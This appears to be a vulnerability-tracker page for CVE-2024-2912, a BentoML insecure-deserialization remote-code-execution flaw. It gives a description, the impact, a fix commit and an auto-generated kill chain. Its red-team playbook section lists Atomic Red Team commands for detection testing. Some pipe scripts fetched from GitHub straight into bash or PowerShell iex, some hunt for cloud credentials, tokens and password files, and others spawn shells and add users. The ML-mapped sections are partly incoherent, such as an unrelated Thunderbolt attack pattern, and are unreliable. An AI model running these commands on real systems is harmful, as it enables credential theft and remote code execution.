CVE-2024-2912
Overview
This vulnerability is an insecure deserialization flaw within the BentoML framework, specifically affecting the handling of serialized objects sent to its API endpoints. The root cause lies in the deserialization process that does not validate or sanitize incoming serialized data, allowing crafted objects to execute arbitrary operating system commands upon deserialization. The affected component is the BentoML server's endpoint responsible for processing POST requests containing serialized payloads.
Vulnerability Description
An insecure deserialization vulnerability exists in the BentoML framework, allowing remote code execution (RCE) by sending a specially crafted POST request. By exploiting this vulnerability, attackers can execute arbitrary commands on the server hosting the BentoML application. The vulnerability is triggered when a serialized object, crafted to execute OS commands upon deserialization, is sent to any valid BentoML endpoint. This issue poses a significant security risk, enabling attackers to compromise the server and potentially gain unauthorized access or control.
Impact
An unauthenticated remote attacker can execute arbitrary commands on the server hosting the BentoML application by sending malicious serialized payloads, resulting in full system compromise. This includes unauthorized access, data exfiltration, or disruption of service. The attack vector requires only network access to the exposed BentoML endpoints and no user interaction, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N, with complete confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Users should upgrade BentoML to versions that include the fix introduced in commit fd70379733c57c6368cc022ac1f841b7b426db7b, as detailed in the GitHub advisory at https://github.com/bentoml/bentoml/commit/fd70379733c57c6368cc022ac1f841b7b426db7b. The vendor has not published a formal advisory ID, but the referenced commit addresses the insecure deserialization issue. No alternative workarounds are documented; immediate upgrading is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
An insecure deserialization vulnerability within the BentoML framework allows for remote code execution, presenting a critical security risk for applications utilizing this machine learning model serving tool. The vulnerability arises when an attacker crafts a serialized object that, upon deserialization, executes arbitrary operating system commands. This flaw is particularly dangerous because it can be triggered by sending a specially crafted POST request to any valid endpoint of a BentoML application. The deserialization process, which is intended to reconstruct objects from a serialized format, becomes a vector for executing malicious code, thereby compromising the integrity and security of the server hosting the application.
Attack vectors exploiting this vulnerability are varied and can be executed with relative ease by an attacker with minimal technical skills. By intercepting or crafting a POST request to a vulnerable endpoint, an attacker can inject malicious payloads that execute commands on the server. This could involve accessing sensitive data, installing malware, or even taking full control of the server. The ability to execute arbitrary commands means that attackers can manipulate the server environment, potentially leading to further exploitation of connected systems or networks. Scenarios may include data exfiltration, lateral movement within the network, or deploying ransomware, all of which can have devastating consequences for organizations.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on BentoML for deploying machine learning models. Organizations may face significant financial losses due to operational downtime, data breaches, and the costs associated with incident response and remediation. The reputational damage from a successful attack can also lead to loss of customer trust and potential legal ramifications, especially if sensitive data is compromised. Additionally, the high CVSS score of 10.0 indicates that this vulnerability is not only critical but also easily exploitable, which heightens the urgency for organizations to address it promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is essential to conduct a thorough security assessment of all applications utilizing the BentoML framework to identify any instances of insecure deserialization. Employing application security testing tools can help in identifying vulnerable endpoints and the presence of unsafe deserialization practices. Furthermore, organizations should adopt secure coding practices, such as validating and sanitizing input data, to prevent malicious payloads from being processed. Implementing strict access controls and monitoring for unusual activity on the server can also help in detecting potential exploitation attempts. Regular updates and patches to the BentoML framework, along with comprehensive security training for developers, are crucial in maintaining a robust security posture against such vulnerabilities.
In conclusion, the insecure deserialization vulnerability within the BentoML framework represents a significant threat to the security of applications leveraging this technology. The potential for remote code execution through crafted POST requests underscores the necessity for organizations to prioritize security measures. By understanding the technical details, recognizing the various attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities in the future.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
48%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-2912 |
| huntr.com |
GitHub CVE
|
https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68 |
| github.com |
GitHub CVE
|
https://github.com/bentoml/bentoml/commit/fd70379733c57c6368cc022ac1f841b7b426db7b |